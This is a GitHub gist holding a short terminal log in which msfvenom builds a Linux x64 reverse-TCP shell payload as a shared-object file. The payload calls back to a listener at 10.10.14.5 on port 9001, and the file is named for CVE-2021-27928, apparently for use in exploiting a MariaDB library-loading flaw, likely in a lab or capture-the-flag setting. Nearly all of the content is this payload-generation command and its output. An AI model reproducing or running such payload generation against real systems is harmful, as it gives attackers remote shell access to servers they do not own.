Created
April 2, 2022 07:02
-
-
Save oxtd/b42a01069325317b75fff629790d19c5 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f elf-so -o CVE-2021-27928.so | |
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload | |
[-] No arch selected, selecting arch: x64 from the payload | |
No encoder specified, outputting raw payload | |
Payload size: 74 bytes | |
Final size of elf-so file: 476 bytes | |
Saved as: CVE-2021-27928.so |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment